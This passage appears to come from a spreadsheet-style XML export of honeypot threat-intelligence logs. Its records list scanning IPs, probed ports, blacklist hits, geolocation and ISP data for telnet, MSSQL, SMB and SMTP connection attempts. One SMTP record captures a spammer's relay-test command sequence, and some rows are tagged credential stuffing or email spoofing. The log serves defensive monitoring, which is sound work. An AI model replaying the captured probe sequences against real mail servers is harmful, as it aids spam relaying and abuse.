    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1352"/>
    <x v="1352"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T10:33:00"/>
    <d v="2025-04-12T21:15:03"/>
    <d v="2025-04-17T10:33:00"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'korea.services.net': ['unknown']}"/>
    <n v="35"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="11"/>
    <s v="Seoul"/>
    <s v="NA"/>
    <s v="Seoul (Yeongeon-dong)"/>
    <s v="1835848"/>
    <s v="NA"/>
    <s v="37.5787"/>
    <s v="127.0"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2006-11-01"/>
    <s v="KORNET"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:79a0:86ef"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1353"/>
    <x v="1353"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T10:26:26"/>
    <d v="2023-07-25T04:04:33"/>
    <d v="2025-04-17T10:26:26"/>
    <n v="1678"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_DNS_H2&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_LDAP_H45&amp;&amp;SMA-LAB_SSH_H22&amp;&amp;SMA-LAB_SOCKS5_H19&amp;&amp;SMA-LAB_SMB_H17&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H44"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;53&amp;&amp;80&amp;&amp;389&amp;&amp;22&amp;&amp;1080&amp;&amp;445&amp;&amp;43558&amp;&amp;1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JK"/>
    <s v="Jakarta"/>
    <s v="Kota Administrasi Jakarta Selatan"/>
    <s v="Jakarta"/>
    <s v="1642911"/>
    <s v="NA"/>
    <s v="-6.2246500000000005"/>
    <s v="106.811"/>
    <s v="141898"/>
    <s v="PT Milenial Inti Telekomunikasi"/>
    <s v="PT Milenial Inti Telekomunikasi"/>
    <s v="business"/>
    <s v="PT Inti Kreatif Indonesia"/>
    <s v="2022-03-22"/>
    <s v="IDNIC-JALANNGETOP-ID"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67b8:3462"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1354"/>
    <x v="1354"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T10:25:19"/>
    <d v="2025-04-17T10:25:19"/>
    <d v="2025-04-17T10:25:19"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Neihu District"/>
    <s v="1671467"/>
    <s v="NA"/>
    <s v="25.0689"/>
    <s v="121.591"/>
    <s v="3462"/>
    <s v="HINET"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="corporate"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3de7:10b3"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1355"/>
    <x v="1355"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T10:23:40"/>
    <d v="2025-04-17T10:23:40"/>
    <d v="2025-04-17T10:23:40"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taipei"/>
    <s v="New Taipei"/>
    <s v="Xindian District"/>
    <s v="1674828"/>
    <s v="NA"/>
    <s v="24.9601"/>
    <s v="121.539"/>
    <s v="3462"/>
    <s v="HINET"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="corporate"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:24e3:ebdf"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1356"/>
    <x v="1356"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T10:20:37"/>
    <d v="2025-03-29T12:12:03"/>
    <d v="2025-04-17T10:20:37"/>
    <n v="52"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Session Manipulation&amp;&amp;Email Spoofing&amp;&amp;Spam Message Body&amp;&amp;Credential Stuffing"/>
    <s v="high"/>
    <s v="SMA-LAB_SMTP_H27&amp;&amp;SMA-LAB_SMTP_HC1"/>
    <s v="25&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']}"/>
    <n v="141"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="NL"/>
    <s v="The Netherlands"/>
    <s v="LI"/>
    <s v="Limburg"/>
    <s v="Kerkrade Municipality"/>
    <s v="Eygelshoven"/>
    <s v="2756285"/>
    <s v="6471"/>
    <s v="50.8956"/>
    <s v="6.06924"/>
    <s v="214940"/>
    <s v="KPROHOST LLC"/>
    <s v="Kprohost LLC"/>
    <s v="hosting"/>
    <s v="Pitline Ltd"/>
    <s v="2009-10-30"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'RSET', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'from:&lt;spameri@tiscali.it&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'to:&lt;spameri@tiscali.it&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'DATA', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '95.164.21.98_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Fri, 28 Mar 2025 23:40:34 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'QUIT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'LOGIN', 'command': 'AUTH', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Wed, 2 Apr 2025 13:43:11 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '95.164.21.98_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Sat, 5 Apr 2025 09:12:38 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;NA&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Wed, 16 Apr 2025 16:35:31 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c3d3:bf07"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low&amp;&amp;Medium&amp;&amp;High"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1357"/>
    <x v="1357"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T10:16:55"/>
    <d v="2023-09-08T03:52:00"/>
    <d v="2025-04-17T10:16:55"/>
    <n v="56"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_SSH_H7&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="22&amp;&amp;27495&amp;&amp;1433&amp;&amp;445&amp;&amp;54726&amp;&amp;54717"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="24309"/>
    <s v="Atria Convergence Technologies Pvt. Ltd.,"/>
    <s v="ACT Fibernet"/>
    <s v="residential"/>
    <s v="Atria Convergence Technologies Pvt. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (106.51.61.94,50904)}&amp;&amp;{Data_SMB:Incoming connection (106.51.61.94,51631)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (106.51.61.94,64740)}&amp;&amp;{Data_SMB:Incoming connection (106.51.61.94,49737)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (106.51.61.94,61808)}&amp;&amp;{Data_SMB:Incoming connection (106.51.61.94,62754)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6a33:3d5e"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1358"/>
    <x v="1358"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T10:10:22"/>
    <d v="2025-04-16T00:44:22"/>
    <d v="2025-04-17T10:10:22"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;abuseipdb"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="MG"/>
    <s v="Minas Gerais"/>
    <s v="Belo Horizonte"/>
    <s v="Belo Horizonte"/>
    <s v="3470127"/>
    <s v="NA"/>
    <s v="-19.9208"/>
    <s v="-43.9378"/>
    <s v="26599"/>
    <s v="TELEFÔNICA BRASIL S.A"/>
    <s v="Vivo"/>
    <s v="business"/>
    <s v="TELEF�NICA BRASIL S.A"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b174:90e2"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1359"/>
    <x v="1359"/>
    <s v="NA&amp;&amp;238-207-50-195.sta.estpak.ee"/>
    <x v="0"/>
    <d v="2025-04-17T10:10:15"/>
    <d v="2025-04-14T23:48:40"/>
    <d v="2025-04-17T10:10:15"/>
    <n v="32"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H22"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="EE"/>
    <s v="Estonia"/>
    <s v="37"/>
    <s v="Harjumaa"/>
    <s v="Tallinn"/>
    <s v="Tallinn (Lasnamäe linnaosa)"/>
    <s v="588409"/>
    <s v="NA"/>
    <s v="59.4388"/>
    <s v="24.8046"/>
    <s v="3249"/>
    <s v="Telia Eesti AS"/>
    <s v="Telia Eesti AS"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c332:cfee"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1360"/>
    <x v="1360"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T09:41:20"/>
    <d v="2025-04-17T06:33:54"/>
    <d v="2025-04-17T09:41:20"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_HC1"/>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2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c1:fdc3"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1361"/>
    <x v="1361"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T09:37:27"/>
    <d v="2024-04-07T13:19:00"/>
    <d v="2025-04-17T09:37:27"/>
    <n v="447"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_SMB_H44&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H25&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_REDIS_H13&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_SMB_H24&amp;&amp;SMA-LAB_MSSQL_H24&amp;&amp;SMA-LAB_MSSQL_H23&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MSSQL_H13"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;445&amp;&amp;6379&amp;&amp;9154"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="BA"/>
    <s v="Bali"/>
    <s v="Badung Regency"/>
    <s v="Banjar Jabejero"/>
    <s v="7334406"/>
    <s v="NA"/>
    <s v="-8.59554"/>
    <s v="115.272"/>
    <s v="138064"/>
    <s v="PT. Jinom Network Indonesia"/>
    <s v="PT. Jinom Network Indonesia"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2021-10-27"/>
    <s v="JINOM-ID"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.175.83.92,62033)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.175.83.92,50879)}&amp;&amp;{Data_SMB:Incoming connection (103.175.83.92,51346)}&amp;&amp;{Data_SMB:Incoming connection (103.175.83.92,51186)}&amp;&amp;{Data_SMB:Incoming connection (103.175.83.92,51834)}&amp;&amp;{Data_SMB:Incoming connection (103.175.83.92,61308)}&amp;&amp;{Data_SMB:Incoming connection (103.175.83.92,61700)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67af:535c"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1362"/>
    <x v="1362"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T09:30:03"/>
    <d v="2025-04-17T09:19:04"/>
    <d v="2025-04-17T09:30:03"/>
    <n v="17"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'spamsources.fabel.dk': ['unknown']}"/>
    <n v="77"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="MK"/>
    <s v="North Macedonia"/>
    <s v="NA"/>
    <s v="Grad Skopje"/>
    <s v="Šuto Orizari"/>
    <s v="Šuto Orizare"/>
    <s v="833258"/>
    <s v="NA"/>
    <s v="42.04"/>
    <s v="21.425"/>
    <s v="6821"/>
    <s v="Makedonski Telekom AD-Skopje"/>
    <s v="Makedonski Telekom AD-Skopje"/>
    <s v="residential"/>
    <s v="MT Adsl"/>
    <s v="2008-01-24"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:4d1d:aa77"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1363"/>
    <x v="1363"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T09:18:33"/>
    <d v="2025-04-17T09:18:33"/>
    <d v="2025-04-17T09:18:33"/>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de:6bf2"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1364"/>
    <x v="1364"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T09:16:18"/>
    <d v="2024-07-11T19:11:00"/>
    <d v="2025-04-17T09:16:18"/>
    <n v="19"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Incomming Traffic&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_HTTPS_H4&amp;&amp;SMA-LAB_SOCKS5_H37&amp;&amp;SMA-LAB_POP3_HC1&amp;&amp;SMA-LAB_MT-CPA_H23"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;50939&amp;&amp;25193&amp;&amp;443&amp;&amp;1080&amp;&amp;110&amp;&amp;50534&amp;&amp;6667&amp;&amp;56623&amp;&amp;5900&amp;&amp;56650&amp;&amp;50566"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3833"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA&amp;&amp;connection&amp;&amp;GET&amp;&amp;command"/>
    <s v="NA&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:93b9:857c"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1365"/>
    <x v="1365"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T09:14:02"/>
    <d v="2025-03-17T09:23:51"/>
    <d v="2025-04-17T09:14:02"/>
    <n v="9"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Chengalpattu"/>
    <s v="Chennai (Pallikaranai)"/>
    <s v="1264527"/>
    <s v="600100"/>
    <s v="12.9389"/>
    <s v="80.2121"/>
    <s v="133000"/>
    <s v="ARJUN TELECOM PVT. LTD."/>
    <s v="Arjun Telecom Pvt. Ltd."/>
    <s v="business"/>
    <s v="Arjun Telecom Pvt. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ca3d:79aa"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1366"/>
    <x v="1366"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T08:59:25"/>
    <d v="2024-12-25T15:11:43"/>
    <d v="2025-04-17T08:59:25"/>
    <n v="47"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H8"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
